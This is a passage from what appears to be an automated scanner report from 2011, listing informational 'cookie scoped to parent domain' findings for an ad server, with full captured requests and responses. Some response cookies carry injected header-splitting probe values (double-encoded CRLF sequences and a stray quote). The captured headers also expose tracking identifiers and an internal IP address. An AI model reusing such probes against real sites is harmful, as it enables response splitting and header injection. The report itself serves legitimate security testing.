Cookie: put_1994=vf1kj11kp2en; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1185=2925993182975414771; put_1986=6422714091563403120; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; put_2146=n4tx19dbice3prpg7887b1ymgzfc6iit; csi15=1300434.js^11^1315322155^1315325244&1295121.js^3^1315321144^1315321847&2553663.js^5^1315321038^1315321537&1295156.js^3^1315320939^1315321025&638177.js^2^1315313132^1315313451; rpb=7908%3D1%264940%3D1%267751%3D1%265364%3D1%264210%3D1%267259%3D1%267249%3D1%266432%3D1; ruid=154e62c97432177b6a4bcd01^5^1315404849^840399722; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3Ud4wsGOQ2PP8TzZUxGDmBad2r6N25AKxdPo9e; rdk=7725/12338; rdk2=0; ses2=12338^1; csi2=3199967.js^1^1315404849^1315404849&1295153.js^1^1315321061^1315321061

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 14:14:12 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: rdk=7725/12338; expires=Wed, 07-Sep-2011 15:14:12 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk15=0; expires=Wed, 07-Sep-2011 15:14:12 GMT; max-age=10; path=/; domain=.rubiconproject.com
Set-Cookie: ses15=12338^2; expires=Thu, 08-Sep-2011 05:59:59 GMT; max-age=63947; path=/; domain=.rubiconproject.com
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: csi15=3212309.js^1^1315404852^1315404852&3199969.js^1^1315404852^1315404852&1300434.js^11^1315322155^1315325244&1295121.js^3^1315321144^1315321847&2553663.js^5^1315321038^1315321537&1295156.js^3^1315320939^1315321025; expires=Wed, 14-Sep-2011 14:14:12 GMT; max-age=604800; path=/; domain=.rubiconproject.com;
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Content-Type: application/x-javascript
Content-Length: 2135

rubicon_cb = Math.random(); rubicon_rurl = document.referrer; if(top.location==document.location){rubicon_rurl = document.location;} rubicon_rurl = escape(rubicon_rurl);
window.rubicon_ad = "3212309"
...[SNIP]...

8.21. http://optimized-by.rubiconproject.com/a/7725/12338/21770-2.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optimized-by.rubiconproject.com
Path:   /a/7725/12338/21770-2.js

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /a/7725/12338/21770-2.js?cb=25504210&keyword=ndm|news.home HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://www.ntnews.com.au/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1986=6422714091563403120; put_2146=n4tx19dbice3prpg7887b1ymgzfc6iit; ruid=154e62c97432177b6a4bcd01^5^1315404849^840399722; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3Ud4wsGOQ2PP8TzZUxGDmBad2r6N25AKxdPo9e; put_2081=OO-00000000000000000; put_1430=f0be7f74-7052-4a09-8aa0-ca59d82b3888; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; put_1185=2863298321806118365; put_1197=3620501663059719663; put_2132=439524AE8C6B634E021F5F7802166020; put_2271=DUSYkUQpjy1LEYeYEnMS6srZRiE; put_2025=f9bdca69-e609-4297-9145-48ea56a0756c; put_2100=usr3fe3ac8db403a568; au=GSAE3LG5-KKTN-10.208.77.156; csi2=3151648.js^1^1315404875^1315404875&3196945.js^1^1315404874^1315404874&3199967.js^1^1315404849^1315404849&1295153.js^1^1315321061^1315321061; put_2245=b6ae888c-d95b-11e0-b096-0025900e0834; rpb=7908%3D1%264940%3D1%267751%3D1%265364%3D1%267259%3D1%267249%3D1%266432%3D1%265671%3D1%264210%3D1%264212%3D1%267935%3D1%266073%3D1%267727%3D1%265852%3D1; put_2101=f31d0c43-cd91-4caf-ae01-86754c3f8535; rdk15=1; ses15=12338^3&12590^3; csi15=3151650.js^1^1315404889^1315404889&3196947.js^1^1315404889^1315404889&3186719.js^1^1315404875^1315404875&3212309.js^1^1315404855^1315404855&3199969.js^1^1315404852^1315404852&1300434.js^11^1315322155^1315325244&1295121.js^3^1315321144^1315321847&2553663.js^5^1315321038^1315321537&1295156.js^3^1315320939^1315321025; cd=false; lm="7 Sep 2011 14:14:54 GMT"; rdk=7725/12338; rdk2=0; ses2=12338^4&12590^2

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 14:16:27 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: rdk=7725/12338; expires=Wed, 07-Sep-2011 15:16:27 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk2=04e8588ddfde552dd9c270269; expires=Wed, 07-Sep-2011 15:16:27 GMT; max-age=10; path=/; domain=.rubiconproject.com
Set-Cookie: ses2=12338^10&12590^103; expires=Thu, 08-Sep-2011 05:59:59 GMT; max-age=63812; path=/; domain=.rubiconproject.com
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Content-Type: application/x-javascript
Content-Length: 2289

rubicon_cb = Math.random(); rubicon_rurl = document.referrer; if(top.location==document.location){rubicon_rurl = document.location;} rubicon_rurl = escape(rubicon_rurl);
window.rubicon_ad = "3191335"
...[SNIP]...

8.22. http://optimized-by.rubiconproject.com/a/7725/12338/21770-2.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optimized-by.rubiconproject.com
Path:   /a/7725/12338/21770-2.js

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /a/7725/12338/21770-2.js?cb=94406255&keyword=ndm|news.home HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://www.themercury.com.au/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1986=6422714091563403120; put_2146=n4tx19dbice3prpg7887b1ymgzfc6iit; ruid=154e62c97432177b6a4bcd01^5^1315404849^840399722; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3Ud4wsGOQ2PP8TzZUxGDmBad2r6N25AKxdPo9e; put_2081=OO-00000000000000000; put_1430=f0be7f74-7052-4a09-8aa0-ca59d82b3888; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; put_1185=2863298321806118365; put_1197=3620501663059719663; put_2132=439524AE8C6B634E021F5F7802166020; put_2271=DUSYkUQpjy1LEYeYEnMS6srZRiE; put_2025=f9bdca69-e609-4297-9145-48ea56a0756c; put_2100=usr3fe3ac8db403a568; au=GSAE3LG5-KKTN-10.208.77.156; put_2245=b6ae888c-d95b-11e0-b096-0025900e0834; rpb=7908%3D1%264940%3D1%267751%3D1%265364%3D1%267259%3D1%267249%3D1%266432%3D1%265671%3D1%264210%3D1%264212%3D1%267935%3D1%266073%3D1%267727%3D1%265852%3D1; put_2101=f31d0c43-cd91-4caf-ae01-86754c3f8535; ses15=12338^3&12590^3; csi15=3151650.js^1^1315404889^1315404889&3196947.js^1^1315404889^1315404889&3186719.js^1^1315404875^1315404875&3212309.js^1^1315404855^1315404855&3199969.js^1^1315404852^1315404852&1300434.js^11^1315322155^1315325244&1295121.js^3^1315321144^1315321847&2553663.js^5^1315321038^1315321537&1295156.js^3^1315320939^1315321025; cd=false; lm="7 Sep 2011 14:14:54 GMT"; rdk=7725/12338; rdk2=0; ses2=12338^5&12590^2; csi2=3165011.js^1^1315404895^1315404895&3151648.js^1^1315404875^1315404875&3196945.js^1^1315404874^1315404874&3199967.js^1^1315404849^1315404849&1295153.js^1^1315321061^1315321061

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 14:17:15 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: rdk=7725/12338; expires=Wed, 07-Sep-2011 15:17:15 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk2=0"; expires=Wed, 07-Sep-2011 15:17:15 GMT; max-age=10; path=/; domain=.rubiconproject.com
Set-Cookie: ses2=12338^6&12590^2568bf%250d%250ae6d071c9e42; expires=Thu, 08-Sep-2011 05:59:59 GMT; max-age=63764; path=/; domain=.rubiconproject.com
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: csi2=3165011.js^3^1315404895^1315405035&3151648.js^2^1315404875^1315404931&3196945.js^2^1315404874^1315404931&3199967.js^1^1315404849^1315404849&1295153.js^1^1315321061^1315321061; expires=Wed, 14-Sep-2011 14:17:15 GMT; max-age=604800; path=/; domain=.rubiconproject.com;
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Content-Type: application/x-javascript
Content-Length: 1886

rubicon_cb = Math.random(); rubicon_rurl = document.referrer; if(top.location==document.location){rubicon_rurl = document.location;} rubicon_rurl = escape(rubicon_rurl);
window.rubicon_ad = "3165011"
...[SNIP]...

8.23. http://optimized-by.rubiconproject.com/a/7725/12338/22678-15.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optimized-by.rubiconproject.com
Path:   /a/7725/12338/22678-15.js

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /a/7725/12338/22678-15.js?cb=9938969&keyword=ndm|business.businessold HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://www.perthnow.com.au/business/business-old/fraud-blackmail-in-latest-oswal-claims/story-e6frg2qu-1226131700884
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1986=6422714091563403120; put_2146=n4tx19dbice3prpg7887b1ymgzfc6iit; ruid=154e62c97432177b6a4bcd01^5^1315404849^840399722; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3Ud4wsGOQ2PP8TzZUxGDmBad2r6N25AKxdPo9e; put_2081=OO-00000000000000000; put_1430=f0be7f74-7052-4a09-8aa0-ca59d82b3888; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; put_1185=2863298321806118365; put_1197=3620501663059719663; put_2132=439524AE8C6B634E021F5F7802166020; put_2271=DUSYkUQpjy1LEYeYEnMS6srZRiE; put_2025=f9bdca69-e609-4297-9145-48ea56a0756c; put_2100=usr3fe3ac8db403a568; au=GSAE3LG5-KKTN-10.208.77.156; put_2245=b6ae888c-d95b-11e0-b096-0025900e0834; rpb=7908%3D1%264940%3D1%267751%3D1%265364%3D1%267259%3D1%267249%3D1%266432%3D1%265671%3D1%264210%3D1%264212%3D1%267935%3D1%266073%3D1%267727%3D1%265852%3D1; put_2101=f31d0c43-cd91-4caf-ae01-86754c3f8535; cd=false; lm="7 Sep 2011 14:14:54 GMT"; csi15=3188306.js^1^1315404900^1315404900&3151650.js^1^1315404889^1315404889&3196947.js^1^1315404889^1315404889&3186719.js^1^1315404875^1315404875&3212309.js^1^1315404855^1315404855&3199969.js^1^1315404852^1315404852&1300434.js^11^1315322155^1315325244&1295121.js^3^1315321144^1315321847&2553663.js^5^1315321038^1315321537&1295156.js^3^1315320939^1315321025; ses15=12338^10&12590^8; rdk=7725/12338; rdk2=0; ses2=12338^16&12590^6; csi2=3165011.js^3^1315404895^1315405144&3151648.js^2^1315404875^1315404931&3196945.js^2^1315404874^1315404931&3199967.js^1^1315404849^1315404849&1295153.js^1^1315321061^1315321061

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 14:24:35 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: rdk=7725/12338; expires=Wed, 07-Sep-2011 15:24:35 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk15=04e8588ddd34dd9206cdecba9; expires=Wed, 07-Sep-2011 15:24:35 GMT; max-age=10; path=/; domain=.rubiconproject.com
Set-Cookie: ses15=12338^19&12590^14; expires=Thu, 08-Sep-2011 05:59:59 GMT; max-age=63324; path=/; domain=.rubiconproject.com
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Content-Type: application/x-javascript
Content-Length: 3195

rubicon_cb = Math.random(); rubicon_rurl = document.referrer; if(top.location==document.location){rubicon_rurl = document.location;} rubicon_rurl = escape(rubicon_rurl);
window.rubicon_ad = "3182366"
...[SNIP]...

8.24. http://optimized-by.rubiconproject.com/a/7725/12338/22678-2.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optimized-by.rubiconproject.com
Path:   /a/7725/12338/22678-2.js

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /a/7725/12338/22678-2.js?cb=89263094&keyword=ndm|business.businessold HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://www.perthnow.com.au/business/business-old/fraud-blackmail-in-latest-oswal-claims/story-e6frg2qu-1226131700884
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1986=6422714091563403120; put_2146=n4tx19dbice3prpg7887b1ymgzfc6iit; ruid=154e62c97432177b6a4bcd01^5^1315404849^840399722; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3Ud4wsGOQ2PP8TzZUxGDmBad2r6N25AKxdPo9e; put_2081=OO-00000000000000000; put_1430=f0be7f74-7052-4a09-8aa0-ca59d82b3888; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; put_1185=2863298321806118365; put_1197=3620501663059719663; put_2132=439524AE8C6B634E021F5F7802166020; put_2271=DUSYkUQpjy1LEYeYEnMS6srZRiE; put_2025=f9bdca69-e609-4297-9145-48ea56a0756c; put_2100=usr3fe3ac8db403a568; au=GSAE3LG5-KKTN-10.208.77.156; put_2245=b6ae888c-d95b-11e0-b096-0025900e0834; rpb=7908%3D1%264940%3D1%267751%3D1%265364%3D1%267259%3D1%267249%3D1%266432%3D1%265671%3D1%264210%3D1%264212%3D1%267935%3D1%266073%3D1%267727%3D1%265852%3D1; put_2101=f31d0c43-cd91-4caf-ae01-86754c3f8535; cd=false; lm="7 Sep 2011 14:14:54 GMT"; csi15=3188306.js^1^1315404900^1315404900&3151650.js^1^1315404889^1315404889&3196947.js^1^1315404889^1315404889&3186719.js^1^1315404875^1315404875&3212309.js^1^1315404855^1315404855&3199969.js^1^1315404852^1315404852&1300434.js^11^1315322155^1315325244&1295121.js^3^1315321144^1315321847&2553663.js^5^1315321038^1315321537&1295156.js^3^1315320939^1315321025; csi2=3151648.js^2^1315404875^1315404931&3196945.js^2^1315404874^1315404931&3165011.js^2^1315404895^1315404918&3199967.js^1^1315404849^1315404849&1295153.js^1^1315321061^1315321061; ses15=12338^10&12590^8; rdk=7725/12338; rdk2=0; ses2=12338^15&12590^6

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 14:21:37 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: rdk=7725/12338; expires=Wed, 07-Sep-2011 15:21:37 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk2=04e8588ddb08ddb10f49af8be; expires=Wed, 07-Sep-2011 15:21:37 GMT; max-age=10; path=/; domain=.rubiconproject.com
Set-Cookie: ses2=12338^40&12590^82; expires=Thu, 08-Sep-2011 05:59:59 GMT; max-age=63502; path=/; domain=.rubiconproject.com
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Content-Type: application/x-javascript
Content-Length: 2165

rubicon_cb = Math.random(); rubicon_rurl = document.referrer; if(top.location==document.location){rubicon_rurl = document.location;} rubicon_rurl = escape(rubicon_rurl);
window.rubicon_ad = "3146392"
...[SNIP]...

8.25. http://optimized-by.rubiconproject.com/a/7725/12338/22682-15.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optimized-by.rubiconproject.com
Path:   /a/7725/12338/22682-15.js

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /a/7725/12338/22682-15.js?cb=99484313&keyword=ndm|news.weather HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://weather.news.com.au/wa/perth/perth
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1986=6422714091563403120; put_2146=n4tx19dbice3prpg7887b1ymgzfc6iit; ruid=154e62c97432177b6a4bcd01^5^1315404849^840399722; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3Ud4wsGOQ2PP8TzZUxGDmBad2r6N25AKxdPo9e; put_2081=OO-00000000000000000; csi15=3212309.js^1^1315404855^1315404855&3199969.js^1^1315404852^1315404852&1300434.js^11^1315322155^1315325244&1295121.js^3^1315321144^1315321847&2553663.js^5^1315321038^1315321537&1295156.js^3^1315320939^1315321025; put_1430=f0be7f74-7052-4a09-8aa0-ca59d82b3888; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; ses15=12338^2&12590^2; put_1185=2863298321806118365; put_1197=3620501663059719663; put_2132=439524AE8C6B634E021F5F7802166020; put_2271=DUSYkUQpjy1LEYeYEnMS6srZRiE; put_2025=f9bdca69-e609-4297-9145-48ea56a0756c; rpb=7908%3D1%264940%3D1%267751%3D1%265364%3D1%267259%3D1%267249%3D1%266432%3D1%265671%3D1%264210%3D1%264212%3D1%267935%3D1%266073%3D1; put_2100=usr3fe3ac8db403a568; rdk=7856/12590; rdk2=0; ses2=12338^3&12590^1; csi2=3196945.js^1^1315404874^1315404874&3199967.js^1^1315404849^1315404849&1295153.js^1^1315321061^1315321061; cd=false; au=GSAE3LG5-KKTN-10.208.77.156; lm="7 Sep 2011 14:14:35 GMT"

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 14:14:48 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: rdk=7725/12338; expires=Wed, 07-Sep-2011 15:14:48 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk15=04e8588dd8e11c55ed6b14ad2; expires=Wed, 07-Sep-2011 15:14:48 GMT; max-age=10; path=/; domain=.rubiconproject.com
Set-Cookie: ses15=12338^113&12590^132; expires=Thu, 08-Sep-2011 05:59:59 GMT; max-age=63911; path=/; domain=.rubiconproject.com
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: csi15=3188306.js^1^1315404888^1315404888&3151966.js^3^1315404887^1315404888&3152309.js^12^1315404884^1315404887&3220315.js^1^1315404885^1315404885&3165015.js^3^1315404883^1315404884&3178849.js^1^1315404882^1315404882&3151650.js^2^1315404881^1315404882&3196947.js^2^1315404881^1315404881&3226141.js^1^1315404881^1315404881&3186719.js^1^1315404875^1315404875&3212309.js^1^1315404855^1315404855&3199969.js^1^1315404852^1315404852&1300434.js^11^1315322155^1315325244&1295121.js^3^1315321144^1315321847&2553663.js^5^1315321038^1315321537&1295156.js^3^1315320939^1315321025; expires=Wed, 14-Sep-2011 14:14:48 GMT; max-age=604800; path=/; domain=.rubiconproject.com;
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Content-Type: application/x-javascript
Content-Length: 2134

rubicon_cb = Math.random(); rubicon_rurl = document.referrer; if(top.location==document.location){rubicon_rurl = document.location;} rubicon_rurl = escape(rubicon_rurl);
window.rubicon_ad = "3188306"
...[SNIP]...

8.26. http://optimized-by.rubiconproject.com/a/7725/12338/22682-2.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optimized-by.rubiconproject.com
Path:   /a/7725/12338/22682-2.js

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /a/7725/12338/22682-2.js?cb=56339010&keyword=ndm|news.local HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://www.ntnews.com.au/article/2011/09/07/258681_ntnews.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1986=6422714091563403120; put_2146=n4tx19dbice3prpg7887b1ymgzfc6iit; ruid=154e62c97432177b6a4bcd01^5^1315404849^840399722; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3Ud4wsGOQ2PP8TzZUxGDmBad2r6N25AKxdPo9e; put_2081=OO-00000000000000000; put_1430=f0be7f74-7052-4a09-8aa0-ca59d82b3888; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; put_1185=2863298321806118365; put_1197=3620501663059719663; put_2132=439524AE8C6B634E021F5F7802166020; put_2271=DUSYkUQpjy1LEYeYEnMS6srZRiE; put_2025=f9bdca69-e609-4297-9145-48ea56a0756c; put_2100=usr3fe3ac8db403a568; au=GSAE3LG5-KKTN-10.208.77.156; put_2245=b6ae888c-d95b-11e0-b096-0025900e0834; rpb=7908%3D1%264940%3D1%267751%3D1%265364%3D1%267259%3D1%267249%3D1%266432%3D1%265671%3D1%264210%3D1%264212%3D1%267935%3D1%266073%3D1%267727%3D1%265852%3D1; put_2101=f31d0c43-cd91-4caf-ae01-86754c3f8535; cd=false; lm="7 Sep 2011 14:14:54 GMT"; csi15=3188306.js^1^1315404900^1315404900&3151650.js^1^1315404889^1315404889&3196947.js^1^1315404889^1315404889&3186719.js^1^1315404875^1315404875&3212309.js^1^1315404855^1315404855&3199969.js^1^1315404852^1315404852&1300434.js^11^1315322155^1315325244&1295121.js^3^1315321144^1315321847&2553663.js^5^1315321038^1315321537&1295156.js^3^1315320939^1315321025; csi2=3151648.js^2^1315404875^1315404931&3196945.js^2^1315404874^1315404931&3165011.js^2^1315404895^1315404918&3199967.js^1^1315404849^1315404849&1295153.js^1^1315321061^1315321061; ses2=12338^10&12590^6; rdk=7856/12590; ses15=12338^7&12590^7

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 14:20:05 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: rdk=7725/12338; expires=Wed, 07-Sep-2011 15:20:05 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk2=1c0952%250d%250adc97b2d5930; expires=Wed, 07-Sep-2011 15:20:05 GMT; max-age=10; path=/; domain=.rubiconproject.com
Set-Cookie: ses2=12338^11&12590^454806; expires=Thu, 08-Sep-2011 05:59:59 GMT; max-age=63594; path=/; domain=.rubiconproject.com
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Content-Type: application/x-javascript
Content-Length: 3195

rubicon_cb = Math.random(); rubicon_rurl = document.referrer; if(top.location==document.location){rubicon_rurl = document.location;} rubicon_rurl = escape(rubicon_rurl);
window.rubicon_ad = "3182363"
...[SNIP]...

8.27. http://optimized-by.rubiconproject.com/a/7856/12590/22782-15.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optimized-by.rubiconproject.com
Path:   /a/7856/12590/22782-15.html

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /a/7856/12590/22782-15.html?cb=0.39881858555600047&keyword=smh/business_other HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://www.smh.com.au/business
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1986=6422714091563403120; put_2146=n4tx19dbice3prpg7887b1ymgzfc6iit; ruid=154e62c97432177b6a4bcd01^5^1315404849^840399722; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3Ud4wsGOQ2PP8TzZUxGDmBad2r6N25AKxdPo9e; put_2081=OO-00000000000000000; put_1430=f0be7f74-7052-4a09-8aa0-ca59d82b3888; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; put_1185=2863298321806118365; put_1197=3620501663059719663; put_2132=439524AE8C6B634E021F5F7802166020; put_2271=DUSYkUQpjy1LEYeYEnMS6srZRiE; put_2025=f9bdca69-e609-4297-9145-48ea56a0756c; put_2100=usr3fe3ac8db403a568; au=GSAE3LG5-KKTN-10.208.77.156; put_2245=b6ae888c-d95b-11e0-b096-0025900e0834; rpb=7908%3D1%264940%3D1%267751%3D1%265364%3D1%267259%3D1%267249%3D1%266432%3D1%265671%3D1%264210%3D1%264212%3D1%267935%3D1%266073%3D1%267727%3D1%265852%3D1; put_2101=f31d0c43-cd91-4caf-ae01-86754c3f8535; cd=false; lm="7 Sep 2011 14:14:54 GMT"; csi15=3188306.js^1^1315404900^1315404900&3151650.js^1^1315404889^1315404889&3196947.js^1^1315404889^1315404889&3186719.js^1^1315404875^1315404875&3212309.js^1^1315404855^1315404855&3199969.js^1^1315404852^1315404852&1300434.js^11^1315322155^1315325244&1295121.js^3^1315321144^1315321847&2553663.js^5^1315321038^1315321537&1295156.js^3^1315320939^1315321025; csi2=3151648.js^2^1315404875^1315404931&3196945.js^2^1315404874^1315404931&3165011.js^2^1315404895^1315404918&3199967.js^1^1315404849^1315404849&1295153.js^1^1315321061^1315321061; ses15=12338^7&12590^5; rdk=7856/12590; rdk2=0; ses2=12338^10&12590^5

Response

HTTP/1.1 200 OK
